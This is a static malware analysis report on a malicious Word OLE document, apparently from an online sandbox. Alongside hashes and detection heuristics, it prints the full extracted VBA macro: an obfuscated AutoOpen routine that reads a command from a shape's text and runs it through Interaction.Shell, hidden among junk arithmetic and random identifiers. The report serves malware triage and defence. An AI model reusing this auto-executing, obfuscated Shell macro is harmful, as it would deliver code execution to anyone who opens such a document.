Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2a3a8f12aac0e41a…

MALICIOUS

Office (OLE)

128.6 KB Created: 2018-12-10 12:40:00 Authoring application: Microsoft Office Word First seen: 2019-02-10
MD5: 5bf064ee8a7ec0cfa143253ae955e85f SHA-1: 0d97771bd891537886800a21a0aa3fdde733e0a9 SHA-256: 2a3a8f12aac0e41af29962e229c5b0384e539d5ea2200f1a5dcc7193bad1648e
292 Risk Score

Heuristics 10

  • ClamAV: Doc.Malware.Dldk-6779283-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dldk-6779283-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
Shell(okNhcmY, YbKwA), CZGjErAus)
    RroZKwKHDGBLPVNdmlMO = XXncsRwOrEUDjJsaHVnLo / Tan(158479366) * 298402642 / Tan(263114319) + DwUEhjqjruUBwRfMsMC - Cos(221132911) + (53753236 / Int(LUDfPZCwzdzBpTdKJUdWp))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
ViTGu
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4832 bytes
SHA-256: 573763d317169024caf632e5cbfa6b9d4a2e769f5ea435444118bc39b81f59c6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
135 of 162 identifiers look randomly generated (e.g. 'icZDdKfikGFzSzjtaLXMCsNG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VSjKiRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
ViTGu
End Sub

Attribute VB_Name = "NFqhzjORQXIO"
Function ViTGu()
On Error Resume Next
    IbQmsvkQkuwhtfjlAaA = rwzijzilrBsjVrVUNw / Tan(62689941) * 314581991 / Tan(106584079) + HjzZUmXFwLNVhKi - Cos(248660837) + (40321051 / Int(RzYiCNLBKLXBREHlqRiHfrO))
Set ChVAKLqbsQiRjYdlNTcMhw = JNvTNGwOalmjVsLqzUwIAaq
RnttLOBEFnMmOrd = tCDftsItBccrlosjXq
    EHzfohoTIYrBrz = vchwpKpLhpGWLhpKKTwQb / Tan(313987859) * 61672684 / Tan(95244939) + FoFtjkkPEjVjQjsOwQ - Cos(271599960) + (220977593 / Int(cmSOjhsiKzTTdkWk))
Set BFWHHBUaukFCifUjK = CmfzDrhujBQmwWiiPkKD
lwnmznjfUzmTIUwmCB = aNUSKHljYzPjWGGQnrMG
    OInCKDRnTawdNzGElPi = JJsAQAtNJtcjTYwJn / Tan(79309948) * 114184152 / Tan(327873154) + NqwviAfVpcwlIO - Cos(28475419) + (104077465 / Int(lKJDdawRKoBzRZwkNwTuFh))
Set NsUQfvKJttAaGozkPAdYLiYX = zAvSkVjDKvLIJS
AfHDQwrwNMDubJnjTz = huPrIYUXwsnbFhGX
    winsXpKdKBHUjNj = PztVoJmCCXhhzWW / Tan(197698568) * 141015900 / Tan(265978789) + qwPoJjfQoaQrkfVKh - Cos(16589855) + (304159090 / Int(mskpAIcfofdzvwtJzK))
Set pItwcmfzCcLobbTdzOaoA = zcIwRwnlMKXSEM
uHDULaDcqCYcTwuZWjlJQpj = jJQPBQIWHkCGWTpdwz
Set OLCdS = VSjKiRd.Shapes(CfsNiidIQ + "YCYMRZlapW" + ciMDIjEP).TextFrame
    kQFACKbGGTouFBS = wUvkXETcPkCNVBudQjTSdai / Tan(213518423) * 293816258 / Tan(336665774) + mjttMmpoKlYijz - Cos(187338208) + (242771472 / Int(INlFYLiYizOXpPrYA))
Set tVqqbfMkrrwmVBpNYfNw = XPUdmbQVVjJjQjOb
lFtoUmaviMicrMKBS = GWMpEvPVKoFESamGtI
    RWPYBOYkDCCjHBbjRCdTjE = WKfOnXotrSsbddIFYoUmw / Tan(126419226) * 112608749 / Tan(108130711) + bYsEmdGNptOWAlNOIKNOZ - Cos(326964795) + (21278715 / Int(wFiOSkDsOcMzwoF))
Set lOojuiXDHYnIDBLiVkIjwr = EqVHXZNRUFXcLJTOOhaGuwu
NQhiMjYquTktYaAiuGTDfY = VBWtzYkBHvjuGr
    WGqiGPBHPZZvbz = nIBmzVLwHQAJjHp / Tan(243721116) * 33793716 / Tan(333880881) + VaDIEkiOjQjAAiziUWajhLH - Cos(228137991) + (96845511 / Int(GVzZoTzjcjkzzCT))
Set ciXPAajdVOiSNKS = uwiJOJbPDUFStUYYNb
ZKzFfoWEZpfTSNPFzXJrS = HLfUOjAqGElbtJu
okNhcmY = OLCdS.ContainingRange + iUwfzNIE + ctiHO + BzZwbmpZ + dcihpN + pkTCv + qpaHERhC + UZDuBwj + IAFBH + icaNMjDH
    vDYPjDEGlBOvPLII = qEYkJsurakvnVDcNmVIFz / Tan(326247512) * 213335405 / Tan(275416239) + vziQTqzfiArMalK - Cos(195329971) + (160451091 / Int(SISPzlidqADjtYi))
Set OsMbHuvIqDlBLkzbbrOj = fBwhpAzbuGTdvWRRzwXNJY
zhRFDbIBJBsjqPtRuwjwwSX = NfKitqTcHHwAYuvzm
    sNdobESQifTflzIQVSPhKWuW = sPjBYdKUlJFMAjrOZzd / Tan(149064566) * 163372879 / Tan(223782355) + TLSqvGpWTGOjolO - Cos(65184254) + (17823667 / Int(LznDDVmXTkZQABK))
Set NqGmPNwnlFlzDcK = bNNiTQIzDXnEzDGNZjYYDP
zDARzjpUrampmnbowhJjrar = izYXXDljLTQiTwKNODwdLN
    WQwUSzHhluzXZki = qqECpwhYDYwuanWaNfk / Tan(156191683) * 161394084 / Tan(117581683) + XcNBzFirhwpVWlfQ - Cos(173384005) + (225978053 / Int(RtBMGwXXKuAKAYfjZcu))
Set SUhOvkRAohPJpwARVPGDZ = XwhopwqFFnfzHwMnRWjXj
fqVCYOLKWrKkwkjHvUJj = birqEEizkWCzuRqSnYc
    BYiIwqunLriLndPwSFY = nSSJDvFdPzYDBVzc / Tan(333830368) * 7533930 / Tan(308586474) + BaONZPZjnDMEqdkjF - Cos(164033455) + (35893650 / Int(kQXOSfJSjnzRKG))
Set MDFjnWWpLkUNYkOW = vthlCAuuFGDAGvtjQYf
oRfOaLdwRlhRQX = RZbJDKphPTpFpaiHMi
Const YbKwA = 0
    QhvJVSUzvVmkswn = YTjGqGIUbcHlviDiYYzcM / Tan(118441736) * 22433102 / Tan(331564932) + HkrXRflfBuCzPQKYbitKiEN - Cos(116332828) + (22551118 / Int(TALUGQiMiVRwKwVG))
Set nAiIImDljJnLDXZUELlThom = DhpHiYzocKaRUDLNI
XGuAfwrcFkkmMzNQFbzvH = MwiszIzAAXKwQjXC
    MKAfUWZkizjwUXDvYpkLZ = XUMskWHSuJUWfR / Tan(316647940) * 89099488 / Tan(134735297) + BdqdUKAsllfBKHLJmfTclCc - Cos(106990329) + (19446173 / Int(cwsmwLVuJvMuzCrslWm))
Set wMKViQusEzBZaziCzzmUjQz = wsfQktRGdKYPnWHiQ
pKunUCTpsljRMiOuZmkd = LhuvQYTPdrEDCan
    oIkACAWdTwLNtzi = SMrRMuMwCidKjKtYi / Tan(142919063) * 171874670 / Tan(145455999) + ivZJwarTDwWfAtpEovtwl - Cos(332459693) + (158529776 / Int(LuJFnfXXIdoRSHOUUf))
Set fGfiQDTtajZzfXBwERmjYbzW = FYmhhZbFzsQfLtBTlz
jiItQJKCizaEHJLKihMtHz = jflSsXkMndJnsziVXWWtFYn
PCTMEqwaD = Array(wkQMb, tvSmAj, EkNbNih, Interaction _
. _
Shell(okNhcmY, YbKwA), CZGjErAus)
    RroZKwKHDGBLPVNdmlMO = XXncsRwOrEUDjJsaHVnLo / Tan(158479366) * 298402642 / Tan(263114319) + DwUEhjqjruUBwRfMsMC - Cos(221132911) + (53753236 / Int(LUDfPZCwzdzBpTdKJUdWp))
Set YZKEIzvLqGTUmzBCT = dvuqBvbMiiChEltww
ULQDAnnthUhiJHBLstVi = OcvQNJICibpDXhHAav
    icZDdKfikGFzSzjtaLXMCsNG = ltNbtiAtjrsUzwhwvwvPI / Tan(72669493) * 285547822 / Tan(308747523) + qGnEzlPSSsRSGr - Cos(185464911) + (33513520 / Int(lHqZdOpNGwSrca))
Set SaCYNpiGdBiDQj = ESKEZjEbNrwrqpzaqSPzfo
sODBMXwLYjSrzh = BSOzpjOwrQjbnlBhIQ
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.